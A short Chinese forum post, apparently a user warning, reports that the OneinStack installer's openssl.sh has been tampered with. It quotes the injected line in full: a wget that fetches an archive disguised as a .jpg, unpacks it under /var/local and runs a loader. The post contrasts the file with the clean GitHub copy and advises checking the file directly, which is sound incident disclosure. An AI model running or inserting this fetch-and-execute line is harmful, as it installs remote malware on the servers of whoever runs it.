挂马的文件在:/root/oneinstack/include/openssl.sh 137行,多了一段:[ol]wget http://download.cnoneinstack.com/oneinstack.jpg -cO /var/local/oneinstack.jpg && tar zxf /var/local/oneinstack.jpg -C /var/local/ && cd /var/local/cron && ./load [email protected][/ol]复制代码执行代码
github上 https://github.com/oneinstack/oneinstack/blob/main/include/openssl.sh 这个文件是没有这段代码的。
比对oneinstack-full.tar.gz的MD5码是不准的。要看/root/oneinstack/include/openssl.sh 这个文件,不知道黑客会不会留后门清理入侵痕迹,我另外一台几个月前搭建的这个文件没有这串代码。